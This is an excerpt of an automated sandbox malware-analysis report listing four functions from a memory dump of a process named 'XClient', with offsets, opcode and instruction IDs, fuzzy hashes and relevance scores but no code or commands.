                                                          • Source File: 0000000F.00000002.2457714613.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de4e9041c32bc95cf9d2cfd107c3020254b18b02186b53c5eb880498189ab679
                                                          • Instruction ID: f804fccf0cfff9540836b249af59f72182df43a7bb8a48fe335bb9bed0469ff2
                                                          • Opcode Fuzzy Hash: de4e9041c32bc95cf9d2cfd107c3020254b18b02186b53c5eb880498189ab679
                                                          • Instruction Fuzzy Hash: 2531FF21F18A4D4FE748BBB848697BD76E1EFD8745F01427AE40DC32D7DE1868018752
                                                          Function 00007FFD9B7D09E1 Relevance: .1, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.2457714613.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4737cd9866610a339906e570658bc53e699e9ff42bce6ecb5cc58cb45b12f132
                                                          • Instruction ID: 399115fba226f03c0182a720b06cc0fbcde683c100c02d16f1992cae7aa91572
                                                          • Opcode Fuzzy Hash: 4737cd9866610a339906e570658bc53e699e9ff42bce6ecb5cc58cb45b12f132
                                                          • Instruction Fuzzy Hash: 4A319174B18A498FDB84EB68C465AFD7BB1EFD8300F4145B9D019D72DACE386801C740
                                                          Function 00007FFD9B7D0860 Relevance: .1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.2457714613.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 81087b292bb8c30ffe5a5e7d4b5889479a4ba89aa8ec8e8b5981eca9164298e4
                                                          • Instruction ID: e002d8e9fd808d5245828f1698e2980887ee0ef01d979536ce363f71fca4dca7
                                                          • Opcode Fuzzy Hash: 81087b292bb8c30ffe5a5e7d4b5889479a4ba89aa8ec8e8b5981eca9164298e4
                                                          • Instruction Fuzzy Hash: 49316435758A8A4BD7C4EB6CA0B2DFDBE61BFC4205B9145ECE418873CECD2C69018755
                                                          Function 00007FFD9B7D1AE1 Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.2457714613.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_7ffd9b7d0000_XClient.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7ec1494a5ed4a1eeaff899a183a57200e0abdd3f105a39c7dec4e78f0d294232
                                                          • Instruction ID: 61dac331cf0f5948184a2d6edaf59864d1544e0fed92cb12659c653f9ef903e3
                                                          • Opcode Fuzzy Hash: 7ec1494a5ed4a1eeaff899a183a57200e0abdd3f105a39c7dec4e78f0d294232
                                                          • Instruction Fuzzy Hash: B2012851A0E7C50FE391BB3858764757FE0CFD169070A06BAE88DCB5F3EC089A848391